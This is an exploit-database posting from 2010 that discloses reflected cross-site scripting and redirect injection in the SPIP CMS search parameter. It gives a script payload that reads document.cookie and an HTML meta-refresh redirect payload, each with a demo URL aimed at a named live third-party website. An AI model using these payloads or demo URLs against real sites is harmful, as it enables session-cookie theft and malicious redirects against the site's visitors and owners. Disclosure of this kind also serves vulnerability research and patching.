[ authorization ] [ registration ] [ restore account ]
Contact us
You can contact us by:
0day Today Exploits Market and 0day Exploits Database

SPIP CMS (XSS/URL Redirecting) Multiple Vulnerability

Author
The_Exploited
Risk
[
Security Risk Unsored
]
0day-ID
0day-ID-11943
Category
web applications
Date add
23-04-2010
Platform
php
=====================================================
SPIP CMS (XSS/URL Redirecting) Multiple Vulnerability
=====================================================

1-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=0
0     _                   __           __       __                     1
1   /' \            __  /'__`\        /\ \__  /'__`\                   0
0  /\_, \    ___   /\_\/\_\ \ \    ___\ \ ,_\/\ \/\ \  _ ___           1
1  \/_/\ \ /' _ `\ \/\ \/_/_\_<_  /'___\ \ \/\ \ \ \ \/\`'__\          0
0     \ \ \/\ \/\ \ \ \ \/\ \ \ \/\ \__/\ \ \_\ \ \_\ \ \ \/           1
1      \ \_\ \_\ \_\_\ \ \ \____/\ \____\\ \__\\ \____/\ \_\           0
0       \/_/\/_/\/_/\ \_\ \/___/  \/____/ \/__/ \/___/  \/_/           1
1                  \ \____/ >> Exploit database separated by exploit   0
0                   \/___/          type (local, remote, DoS, etc.)    1
1                                                                      1
0  [+] Site            : Inj3ct0r.com                                  0
1  [+] Support e-mail  : submit[at]inj3ct0r.com                        1
0                                                                      0
1                 ###########################################          1
0                 I'm The_Exploited member from Inj3ct0r Team          1
1                 ###########################################          0
0-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-==-=-=-1

[+] Discovered By: The_Exploited

@Title: SPIP CMS (XSS/URL Redirecting) Multiple Vulnerability

@Author: The_Exploited aka l3d aka Spoof

@Mail: spoof@live.it

@Site: http://site.securityspl0its.com/ - http://forum.securityspl0its.com/

@Exploit (XSS): "><script>alert(document.cookie)</script>

@Demo (XSS): http://www.mysite.com/spip/index.php?recherche=[XSS]

@Demo online: http://www.baleria.com/index.php?recherche=%22%3E%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&bbaler=Buscar&body=recherche

@Exploit (URL Redirecting Vuln): <HTML> <HEAD> <TITLE>Redirect...</TITLE> <META HTTP-EQUIV="REFRESH" CONTENT="0; URL=http://www.google.com"> </HEAD> <BODY> Redirecting...By The_Exploited</BODY> </HTML>

@Demo (URL Redirecting Vuln): http://www.mysite.com/spip/index.php?recherche=[REDIRECT]

@Demo online (URL Redirecting Vuln): http://www.baleria.com/index.php?recherche=<HTML> <HEAD> <TITLE>Redirect...</TITLE> <META HTTP-EQUIV="REFRESH" CONTENT="0; URL=http://www.google.com"> </HEAD> <BODY> Redirecting...By The_Exploited</BODY> </HTML>&bbaler=Buscar&body=recherche

@CMS Version: All

@CMS Download: http://www.spip.net/



#  0day.today [2024-07-05]  #